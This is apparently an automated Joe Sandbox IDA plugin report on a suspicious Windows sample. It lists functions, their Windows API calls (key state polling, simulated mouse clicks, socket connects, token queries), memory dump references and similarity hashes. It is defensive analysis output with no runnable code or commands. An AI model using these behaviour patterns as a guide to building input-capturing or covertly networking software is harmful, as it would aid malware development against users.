Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 56c83bcbd6ee9cd70fe30793a866ef0cd8ed25b2ca3967694d686df1778f54be
Instruction ID: 5410c0531df7dd0c38053434a832aba25f5f76e09aae7bd8c0bfe3c976a6350b
Opcode Fuzzy Hash: 56c83bcbd6ee9cd70fe30793a866ef0cd8ed25b2ca3967694d686df1778f54be
Instruction Fuzzy Hash: 34412D35A00105DFDF01EF65C9819AEBBF5FF08314B1480AAE91AAB361DB35ED01DB54

Function 004AB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 004AB64F
ScreenToClient.USER32(00000000,000000FF), ref: 004AB66C
GetAsyncKeyState.USER32(00000001), ref: 004AB691
GetAsyncKeyState.USER32(00000002), ref: 004AB69F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: b57a04f8d36d9a812a8d17e7c87ce1d5da9882ea9067b2735efdff84c9b8765c
Instruction ID: 6f551ea22b79e10f5fd1f501725b17f350c77e07a35cb43d53355c2ff76f2a87
Opcode Fuzzy Hash: b57a04f8d36d9a812a8d17e7c87ce1d5da9882ea9067b2735efdff84c9b8765c
Instruction Fuzzy Hash: DE418131504109FBCF159F64C844AEDBB74FB16324F10831AF829962D1CB34AD94DFA5

Function 004CB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004CB369
PostMessageW.USER32(?,00000201,00000001), ref: 004CB413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004CB41B
PostMessageW.USER32(?,00000202,00000000), ref: 004CB429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004CB431

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: b2e406e3e0d90d2414c2a49a17e6cc42129e82d52e6d4cc1d5319ea662dd47f8
Instruction ID: b2ea0498daa8889ae8c859206eccb008de714678f4d09d827ae4b9c154d78629
Opcode Fuzzy Hash: b2e406e3e0d90d2414c2a49a17e6cc42129e82d52e6d4cc1d5319ea662dd47f8
Instruction Fuzzy Hash: D531F175900259EBDF04CF68DD4EBDE3BB5EB00319F00822AF820A72D1C3B49914DB94

Function 004CDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004CDBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004CDBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004CDC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004CDC52
_wcsstr.LIBCMT ref: 004CDC5C

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 5f5146ac048b05b905c2a4b639fdaccef05cfab16a7849a5507a38dfb9942db8
Instruction ID: f0e084b4fd2f3deb64d788aea58773345552e68ed30571ffb3f9420ecd553d0a
Opcode Fuzzy Hash: 5f5146ac048b05b905c2a4b639fdaccef05cfab16a7849a5507a38dfb9942db8
Instruction Fuzzy Hash: A0212975604200BBEB555F79DC49FBB7BA8DF55750F10803FF809CA191EAA9DC01E268

Function 004CBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004CBC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004CBCC2
__itow.LIBCMT ref: 004CBCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004CBD00
__itow.LIBCMT ref: 004CBD11

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: e977d76146c5eb86730a4d39b5adf0cbb6c76153ec81c20341115dfc0943f69f
Instruction ID: ec12ba14276cb07393fa3e9cd1599f73cacedcd35b5f1a2c6012d1fe40e118ae
Opcode Fuzzy Hash: e977d76146c5eb86730a4d39b5adf0cbb6c76153ec81c20341115dfc0943f69f
Instruction Fuzzy Hash: FE21A7396002187ADB51AA668C47FDF7A6CEF5A714F10402EF906EB181DB68890587E5

Function 004D6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 004950E6: _wcsncpy.LIBCMT ref: 004950FA

GetFileAttributesW.KERNEL32(?,?,?,?,004D60C3), ref: 004D6369
GetLastError.KERNEL32(?,?,?,004D60C3), ref: 004D6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004D60C3), ref: 004D6388
_wcsrchr.LIBCMT ref: 004D63AA

Part of subcall function 004D6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004D60C3), ref: 004D63E0

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: d30c9dbf895dbb1df7aa5981c53a790996f05e380267f870da4bd6dd9e28d06a
Instruction ID: 121e2fcc75686e95ce9258e98ebef483e2f30472072bd28235867ec99d05b845
Opcode Fuzzy Hash: d30c9dbf895dbb1df7aa5981c53a790996f05e380267f870da4bd6dd9e28d06a
Instruction Fuzzy Hash: D32138305042145BDB15EB79AC62FEB23ACAF1A360F11446FF815C33C1EB68D9859A6D

Function 004E8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004EA82C: inet_addr.WS2_32(00000000), ref: 004EA84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004E8BD3
WSAGetLastError.WS2_32(00000000), ref: 004E8BE2
connect.WS2_32(00000000,?,00000010), ref: 004E8BFE

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: fa62d245b7a3052fd60bc9e0d8ca2182cb137c25bf985a5a41c9b41a39fdb579
Instruction ID: f4f094bd3005fbbe2f088fe01f24c29d08107a6add70e963d4cd3dbd55149721
Opcode Fuzzy Hash: fa62d245b7a3052fd60bc9e0d8ca2182cb137c25bf985a5a41c9b41a39fdb579
Instruction Fuzzy Hash: A221A1312001149FCB10AF29CD85BBE77A9EF59725F04845EF9169B3D2CB78AC058765

Function 004E8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 004E8441
GetForegroundWindow.USER32 ref: 004E8458
GetDC.USER32(00000000), ref: 004E8494
GetPixel.GDI32(00000000,?,00000003), ref: 004E84A0
ReleaseDC.USER32(00000000,00000003), ref: 004E84DB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: e65008335849cfd1385902202f3c97773cab7297cc1c59368103bc34b18256e9
Instruction ID: 9fb84939b18309dfc4734c4c928deb214e034dc86eb96e1d33d57540867569c1
Opcode Fuzzy Hash: e65008335849cfd1385902202f3c97773cab7297cc1c59368103bc34b18256e9
Instruction Fuzzy Hash: 6821A135A00204AFDB00EFA5D984AAEBBF5EF48345F04C47EE84A97351DB74AC04DBA4

Function 004AAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004AAFE3
SelectObject.GDI32(?,00000000), ref: 004AAFF2
BeginPath.GDI32(?), ref: 004AB009
SelectObject.GDI32(?,00000000), ref: 004AB033

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: da83e40977dfadf66976c40eb398cd6c365cd151bf5812686febe5da93886b81
Instruction ID: 3706a9714f489033520ee44df8b4942d796c0241092f77b7447a94a757323cfe
Opcode Fuzzy Hash: da83e40977dfadf66976c40eb398cd6c365cd151bf5812686febe5da93886b81
Instruction Fuzzy Hash: 40219DB0800709AFDB209F95EC5879B7F78FB313A6F14871BF420922A1D3745859EB99

Function 004B217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004B21A9
CreateThread.KERNEL32(?,?,004B22DF,00000000,?,?), ref: 004B21ED
GetLastError.KERNEL32 ref: 004B21F7
_free.LIBCMT ref: 004B2200
__dosmaperr.LIBCMT ref: 004B220B

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 29b6819f6d457adf134b9629feba0100c6524eb9d16430e6ba7aca27429b6a17
Instruction ID: 43629cf837cffa4de566148aebf532b5572e49781fc9b7954cca4876b3234ac1
Opcode Fuzzy Hash: 29b6819f6d457adf134b9629feba0100c6524eb9d16430e6ba7aca27429b6a17
Instruction Fuzzy Hash: 091148321043066F9B11AFAADD41DDB3BA8EF44774710042FF924C6181DBB9D8119BB9

Function 004CABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004CABD7
GetLastError.KERNEL32(?,004CA69F,?,?,?), ref: 004CABE1
GetProcessHeap.KERNEL32(00000008,?,?,004CA69F,?,?,?), ref: 004CABF0
RtlAllocateHeap.NTDLL(00000000,?,004CA69F), ref: 004CABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004CAC0E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: db18f14f3fec190e6402a257bc3599975f4fe4bcea1b9e3a8bae163f7c2273bd
Instruction ID: a5b76eb3930b4fab9ca70d3b031aae66f24fac443b788a1ff48a18c878ff8d35
Opcode Fuzzy Hash: db18f14f3fec190e6402a257bc3599975f4fe4bcea1b9e3a8bae163f7c2273bd
Instruction Fuzzy Hash: E8016D78200208BFDB104FA5DC4CEAB3BBDEF99358710442AFA05C3260D6718C54DB74

Function 004D7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004D7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004D7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004D7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7AD0

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 5f747ce2d71601e5fcc5f8beeccf033c4ea4b67bb1e6bcd2f533a1f9663d9e71
Instruction ID: a680611fab7409f41390ec4981905ac207e1160053f7c8f93651846859aca5d5
Opcode Fuzzy Hash: 5f747ce2d71601e5fcc5f8beeccf033c4ea4b67bb1e6bcd2f533a1f9663d9e71
Instruction Fuzzy Hash: 57012935C04629EBCF00AFE4DC58ADEBB78FB18711F008457E502B2350EB789654D7A9

Function 004C9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE ref: 004C9ADC
ProgIDFromCLSID.COMBASE(?,00000000), ref: 004C9AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 004C9B05
CoTaskMemFree.COMBASE(00000000), ref: 004C9B15
CLSIDFromString.COMBASE(?,?), ref: 004C9B21

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 4c61e2613ab94219d97b53f5c22450483059396f90647e044ad1614d4b38c96c
Instruction ID: 42a390102bf90ce4817d501a7d73ae37c50dfddf3182c31ae9a3e8225f0564a3
Opcode Fuzzy Hash: 4c61e2613ab94219d97b53f5c22450483059396f90647e044ad1614d4b38c96c
Instruction Fuzzy Hash: 24018F7A600214BFDB104F58EC48FAA7BFDEB54751F148029F905D2210E778ED04ABB0

Function 004CAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004CAA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004CAA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004CAA92
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 004CAA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004CAAAF

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: e1be864ee5d6127e1a108872069edc7c612963005cd5e59dc2e2c1ddbae351b6
Instruction ID: d62faf2db930853888a72a0625368dd34abf4f90e26c71bef11078f39c34bb13
Opcode Fuzzy Hash: e1be864ee5d6127e1a108872069edc7c612963005cd5e59dc2e2c1ddbae351b6
Instruction Fuzzy Hash: AAF08C792402187FEB105FA4EC88FA73BBCFB49758B00441EF941C6290DA669C19DA71

Function 004CAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004CAADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004CAAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004CAAF3
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 004CAAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004CAB10

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 65ba0a1376152741576ef249823e95f1909078a07d7908812d95da4b8dbee962
Instruction ID: a280801d31d9aa0ca6cead3b4396b77b7be79785e56641544bc0b70f0cf93242
Opcode Fuzzy Hash: 65ba0a1376152741576ef249823e95f1909078a07d7908812d95da4b8dbee962
Instruction Fuzzy Hash: 43F08C792402186FEB111FA4EC8CFA73B7DFB49758F00402AFA41C7290EA65AC15DA71

Function 004CEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 004CEC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 004CECAB
MessageBeep.USER32(00000000), ref: 004CECC3
KillTimer.USER32(?,0000040A), ref: 004CECDF
EndDialog.USER32(?,00000001), ref: 004CECF9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 139c32eeca6f955b5cba6bf4a6a69d33f1bd8bf03e78ef6fb7ab12255cd6d7de
Instruction ID: 0e4eddfb041160b85ac878d62e82ed90ccdaf8f549220e5181a3cef2c09b8f30
Opcode Fuzzy Hash: 139c32eeca6f955b5cba6bf4a6a69d33f1bd8bf03e78ef6fb7ab12255cd6d7de
Instruction Fuzzy Hash: F9018134500714ABEB255B11DE5EFD6BBB8FB20705F00455EB583A24E0DBF8AA48DB54

